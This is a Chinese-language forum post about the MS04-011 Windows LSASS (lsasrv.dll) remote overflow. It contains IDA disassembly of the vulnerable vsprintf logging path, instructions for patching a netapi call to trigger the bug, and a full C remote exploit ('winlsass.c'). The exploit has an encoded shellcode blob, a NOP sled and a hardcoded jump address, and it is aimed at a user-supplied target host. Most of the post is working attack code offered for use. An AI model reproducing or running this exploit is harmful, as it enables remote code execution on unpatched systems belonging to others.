mslug#safechina.net
eEye的文档里已经分析的比较清楚了.这里贴一下相关的代码和exp.eEye提出重现这个漏洞最简单的方法是:改变DsRoleUpgradeDownlevelServer API中的指令,使传给DsRolepEncryptPasswordStart的第一个实参变为DsRoleUpgradeDownlevelServer的第九个型参,及将
.text:751AD5F7 lea eax, [ebp+var_34]
.text:751AD5FA push eax
.text:751AD5FB push 0
.text:751AD5FD call _DsRolepEncryptPasswordStart@24
改为
.text:751AD5F7 push eax
mov eax, [ebp+var_34]
push eax
nop
call _DsRolepEncryptPasswordStart@24
然后调用DsRoleUpgradeDownlevelServer就可以了.自己动手改一下吧,(靠,怎么有了破解的感觉 :)
最后感谢oyxin,本来已经不打算调这个东东了. :)
下面是有漏洞的代码部分:
LSASRV!DsRolerUpgradeDownlevelServer
│
----_DsRolepLogPrintRoutine
│
----_DsRolepDebugDumpRoutine
│
----__imp__vsprintf
.text:7859B6D6 ; __stdcall DsRolerUpgradeDownlevelServer(x,x,x,x,x,x,x,x,x,x,x,x,x)
.text:7859B6D6 _DsRolerUpgradeDownlevelServer@52 proc near ; DATA XREF: .text:7855B93C�o
.text:7859B6D6
.text:7859B6D6 var_40 = byte ptr -40h
.text:7859B6D6 var_28 = byte ptr -28h
.text:7859B6D6 var_20 = byte ptr -20h
.text:7859B6D6 var_18 = dword ptr -18h
.text:7859B6D6 var_14 = dword ptr -14h
.text:7859B6D6 Data = byte ptr -10h
.text:7859B6D6 var_C = dword ptr -0Ch
.text:7859B6D6 var_8 = dword ptr -8
.text:7859B6D6 var_4 = dword ptr -4
.text:7859B6D6 arg_0 = dword ptr 8
.text:7859B6D6 arg_4 = dword ptr 0Ch
.text:7859B6D6 arg_8 = dword ptr 10h
.text:7859B6D6 arg_C = dword ptr 14h
.text:7859B6D6 arg_10 = dword ptr 18h
.text:7859B6D6 arg_14 = dword ptr 1Ch
.text:7859B6D6 arg_18 = dword ptr 20h
.text:7859B6D6 arg_1C = dword ptr 24h
.text:7859B6D6 arg_20 = dword ptr 28h
.text:7859B6D6 arg_24 = dword ptr 2Ch
.text:7859B6D6 arg_28 = dword ptr 30h
.text:7859B6D6 arg_2C = dword ptr 34h
.text:7859B6D6 arg_30 = dword ptr 38h
.text:7859B6D6
.text:7859B6D6 push ebp
.text:7859B6D7 mov ebp, esp
.text:7859B6D9 sub esp, 40h
.text:7859B6DC mov eax, [ebp+arg_24]
.text:7859B6DF push ebx
.text:7859B6E0 mov [ebp+var_18], eax
.text:7859B6E3 mov eax, [ebp+arg_28]
.text:7859B6E6 push esi
.text:7859B6E7 push edi
.text:7859B6E8 mov [ebp+var_14], eax
.text:7859B6EB xor eax, eax
.text:7859B6ED lea edi, [ebp+var_28]
.text:7859B6F0 xor ebx, ebx
.text:7859B6F2 stosd
.text:7859B6F3 stosd
.text:7859B6F4 and byte ptr [ebp+var_C], bl
.text:7859B6F7 cmp [ebp+arg_4], ebx
.text:7859B6FA stosd
.text:7859B6FB stosd
.text:7859B6FC mov eax, [ebp+arg_30]
.text:7859B6FF mov [ebp+var_4], ebx
.text:7859B702 mov [ebp+var_8], ebx
.text:7859B705 mov [eax], ebx
.text:7859B707 jz loc_7859B93F
.text:7859B70D cmp [ebp+arg_C], ebx
.text:7859B710 jz loc_7859B93F
.text:7859B716 cmp [ebp+arg_10], ebx
.text:7859B719 jz loc_7859B93F
.text:7859B71F cmp [ebp+arg_14], ebx
.text:7859B722 jz loc_7859B93F
.text:7859B728 call _DsRolepInitializeLog@0 ; DsRolepInitializeLog()
.text:7859B72D push [ebp+arg_4]
.text:7859B730 push offset aDsrolerdcasdcD ; "DsRolerDcAsDc: DnsDomainName %ws\n"
.text:7859B735 push 4
.text:7859B737 pop esi
.text:7859B738 push esi
.text:7859B739 call _DsRolepLogPrintRoutine
.text:7859B73E mov eax, [ebp+arg_8]
.text:7859B741 add esp, 0Ch
.text:7859B744 cmp eax, ebx
.text:7859B746 jnz short loc_7859B74D
.text:7859B748 mov eax, offset aNull ; "(NULL)"
.text:785A059D _DsRolepLogPrintRoutine proc near ; CODE XREF: DsRolerDcAsDc(x,x,x,x,x,x,x,x,x,x,x,x,x,x,x)+AD�p
.text:785A059D ; DsRolerDcAsDc(x,x,x,x,x,x,x,x,x,x,x,x,x,x,x)+BD�p ...
.text:785A059D
.text:785A059D NumberOfBytesWritten= dword ptr 4
.text:785A059D arg_4 = dword ptr 8
.text:785A059D arg_8 = dword ptr 0Ch
.text:785A059D
.text:785A059D lea eax, [esp+arg_8]
.text:785A05A1 push eax ; int
.text:785A05A2 push [esp+4+arg_4] ; int
.text:785A05A6 push [esp+8+NumberOfBytesWritten] ; NumberOfBytesWritten
.text:785A05AA call _DsRolepDebugDumpRoutine@12 ; DsRolepDebugDumpRoutine(x,x,x)
.text:785A05AF retn
.text:785A05AF _DsRolepLogPrintRoutine endp
.text:785A047E ; ??????????????? S U B R O U T I N E ???????????????????????????????????????
.text:785A047E
.text:785A047E ; Attributes: bp-based frame
.text:785A047E
.text:785A047E ; int __stdcall DsRolepDebugDumpRoutine(DWORD NumberOfBytesWritten,int,int)
.text:785A047E _DsRolepDebugDumpRoutine@12 proc near ; CODE XREF: _DsRolepLogPrintRoutine+D�p
.text:785A047E
.text:785A047E var_816 = byte ptr -816h
.text:785A047E var_815 = byte ptr -815h
.text:785A047E Buffer = byte ptr -814h
.text:785A047E var_813 = byte ptr -813h
.text:785A047E SystemTime = _SYSTEMTIME ptr -10h
.text:785A047E NumberOfBytesWritten= dword ptr 8
.text:785A047E arg_4 = dword ptr 0Ch
.text:785A047E arg_8 = dword ptr 10h
.text:785A047E
.text:785A047E push ebp
.text:785A047F mov ebp, esp
.text:785A0481 sub esp, 814h
.text:785A0487 push ebx
.text:785A0488 xor ebx, ebx
.text:785A048A cmp _DsRolepLogFile, ebx
.text:785A0490 jz loc_785A056F
.text:785A0496 push edi
.text:785A0497 push esi
.text:785A0498 xor esi, esi
.text:785A049A cmp dword_785B35B8, ebx
.text:785A04A0 jz short loc_785A04EC
.text:785A04A2 test byte ptr [ebp+NumberOfBytesWritten], 1
.text:785A04A6 jz loc_785A0574
.text:785A04AC mov esi, offset dword_78564F90
.text:785A04B1
.text:785A04B1 loc_785A04B1: ; CODE XREF: DsRolepDebugDumpRoutine(x,x,x)+101�j
.text:785A04B1 ; DsRolepDebugDumpRoutine(x,x,x)+10F�j ...
.text:785A04B1 lea eax, [ebp+SystemTime]
.text:785A04B4 push eax ; lpSystemTime
.text:785A04B5 call ds:__imp__GetLocalTime@4 ; __declspec(dllimport) GetLocalTime(x)
.text:785A04BB movzx eax, [ebp+SystemTime.wSecond]
.text:785A04BF push esi
.text:785A04C0 push eax
.text:785A04C1 movzx eax, [ebp+SystemTime.wMinute]
.text:785A04C5 push eax
.text:785A04C6 movzx eax, [ebp+SystemTime.wHour]
.text:785A04CA push eax
.text:785A04CB movzx eax, [ebp+SystemTime.wDay]
.text:785A04CF push eax
.text:785A04D0 movzx eax, [ebp+SystemTime.wMonth]
.text:785A04D4 push eax
.text:785A04D5 lea eax, [ebp+Buffer]
.text:785A04DB push offset a02u02u02u02u02 ; "%02u/%02u %02u:%02u:%02u %s"
.text:785A04E0 push eax
.text:785A04E1 call ds:__imp__sprintf
.text:785A04E7 add esp, 20h
.text:785A04EA mov esi, eax
.text:785A04EC
.text:785A04EC loc_785A04EC: ; CODE XREF: DsRolepDebugDumpRoutine(x,x,x)+22�j
.text:785A04EC push [ebp+arg_8]
.text:785A04EF lea eax, [ebp+esi+Buffer]
.text:785A04F6 push [ebp+arg_4]
.text:785A04F9 push eax
.text:785A04FA call ds:__imp__vsprintf
.text:785A0500 add esp, 0Ch
.text:785A0503 add esi, eax
.text:785A0505 jz short loc_785A051B
.text:785A0507 cmp [ebp+esi+var_815], 0Ah
.text:785A050F mov dword_785B35B8, 1
.text:785A0519 jz short loc_785A0521
.text:785A051B
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
/******************************************************************
* Windows Lsasrv.dll RPC Remote Exploit
* [MS04-011]
*
* Bug found by: eEye (CoOL!!! :)
*
* Author: mslug (a1476854#hotmail.com), All rights reserved.
*
* Version: 0.2
*
* Tested: Win2k pro en sp4
*
* Compile: cl winlsass.c
*
* Date: 22 Apr 2004
*******************************************************************/
#include <windows.h>
/* from www.cnhonker.com */
unsigned char scode[] =
// decode
"\xEB\x10\x5F\x4f\x33\xC9\x66\xB9\x7D\x01\x80\x34\x0F\x99\xE2\xFA"
"\xEB\x05\xE8\xEB\xFF\xFF\xFF"
// shellcode
"\x70\x95\x98\x99\x99\xC3\xFD\x38\xA9\x99\x99\x99\x12\xD9\x95\x12"
"\xE9\x85\x34\x12\xD9\x91\x12\x41\x12\xEA\xA5\x12\xED\x87\xE1\x9A"
"\x6A\x12\xE7\xB9\x9A\x62\x12\xD7\x8D\xAA\x74\xCF\xCE\xC8\x12\xA6"
"\x9A\x62\x12\x6B\xF3\x97\xC0\x6A\x3F\xED\x91\xC0\xC6\x1A\x5E\x9D"
"\xDC\x7B\x70\xC0\xC6\xC7\x12\x54\x12\xDF\xBD\x9A\x5A\x48\x78\x9A"
"\x58\xAA\x50\xFF\x12\x91\x12\xDF\x85\x9A\x5A\x58\x78\x9B\x9A\x58"
"\x12\x99\x9A\x5A\x12\x63\x12\x6E\x1A\x5F\x97\x12\x49\xF3\x9A\xC0"
"\x71\x1E\x99\x99\x99\x1A\x5F\x94\xCB\xCF\x66\xCE\x65\xC3\x12\x41"
"\xF3\x9C\xC0\x71\xED\x99\x99\x99\xC9\xC9\xC9\xC9\xF3\x98\xF3\x9B"
"\x66\xCE\x75\x12\x41\x5E\x9E\x9B\x99\x99\xAC\xAA\x59\x10\xDE\x9D"
"\xF3\x89\xCE\xCA\x66\xCE\x69\xF3\x98\xCA\x66\xCE\x6D\xC9\xC9\xCA"
"\x66\xCE\x61\x12\x49\x1A\x75\xDD\x12\x6D\xAA\x59\xF3\x89\xC0\x10"
"\x9D\x17\x7B\x62\x10\xCF\xA1\x10\xCF\xA5\x10\xCF\xD9\xFF\x5E\xDF"
"\xB5\x98\x98\x14\xDE\x89\xC9\xCF\xAA\x50\xC8\xC8\xC8\xF3\x98\xC8"
"\xC8\x5E\xDE\xA5\xFA\xF4\xFD\x99\x14\xDE\xA5\xC9\xC8\x66\xCE\x79"
"\xCB\x66\xCE\x65\xCA\x66\xCE\x65\xC9\x66\xCE\x7D\xAA\x59\x35\x1C"
"\x59\xEC\x60\xC8\xCB\xCF\xCA\x66\x4B\xC3\xC0\x32\x7B\x77\xAA\x59"
"\x5A\x71\x76\x67\x66\x66\xDE\xFC\xED\xC9\xEB\xF6\xFA\xD8\xFD\xFD"
"\xEB\xFC\xEA\xEA\x99\xDA\xEB\xFC\xF8\xED\xFC\xC9\xEB\xF6\xFA\xFC"
"\xEA\xEA\xD8\x99\xDC\xE1\xF0\xED\xCD\xF1\xEB\xFC\xF8\xFD\x99\xD5"
"\xF6\xF8\xFD\xD5\xF0\xFB\xEB\xF8\xEB\xE0\xD8\x99\xEE\xEA\xAB\xC6"
"\xAA\xAB\x99\xCE\xCA\xD8\xCA\xF6\xFA\xF2\xFC\xED\xD8\x99\xFB\xF0"
"\xF7\xFD\x99\xF5\xF0\xEA\xED\xFC\xF7\x99\xF8\xFA\xFA\xFC\xE9\xED"
"\x99\xFA\xF5\xF6\xEA\xFC\xEA\xF6\xFA\xF2\xFC\xED\x99";
#define call_ebx 0x78542001 //lsasrv.dll
int WINAPI (*DsRoleUpgradeDownlevelServer)
(DWORD, DWORD, DWORD, DWORD, DWORD, DWORD,
DWORD, DWORD, DWORD, DWORD, DWORD, DWORD);
#define LEN 10000
char buf[LEN+1];
char sendbuf[(LEN+1)*2];
char buf2[2000];
char target2[200];
int main(int argc, char *argv[])
{
HMODULE hNetapi;
int ret;
int i;
char c, *target;
if (argc < 2) {
printf("%s <target_host>", argv[0]);
return 0;
}
target = argv[1];
hNetapi = LoadLibrary("myNetapi.dll");
if (!hNetapi) {
printf("[-] Can't load myNetapi32.dll.\n");
exit(0);
}
(DWORD *)DsRoleUpgradeDownlevelServer = (DWORD *)GetProcAddress(hNetapi, "DsRoleUpgradeDownlevelServer");
if (!DsRoleUpgradeDownlevelServer) {
printf("[-] Can't find function.\n");
exit(0);
}
memset(buf, '\x90', LEN);
memcpy(&buf[2840], "\xeb\x06\xeb\x06", 4);
*(DWORD *)&buf[2844] = call_ebx;
memcpy(&buf[2856], scode, strlen(scode));
for(i=0; i<LEN; i++) { //unicode
sendbuf[i*2] = buf[i];
sendbuf[i*2+1] = 0;
}
memset(target2, 0, 100);
for(i=0; i<strlen(target); i++) {
target2[i*2] = target[i];
target2[i*2+1] = 0;
}
memset(buf2, 0, 2000);
DsRoleUpgradeDownlevelServer(&sendbuf[0], &buf2[0], &buf2[0], &buf2[0], &buf2[0], &buf2[0],
&buf2[0], &buf2[0], target2, &buf2[0], &buf2[0], &buf2[0]);
return 0;
}
|
论坛用户
论坛: 病毒专区
标题: QQ尾巴病毒的发送原理分析
论坛用户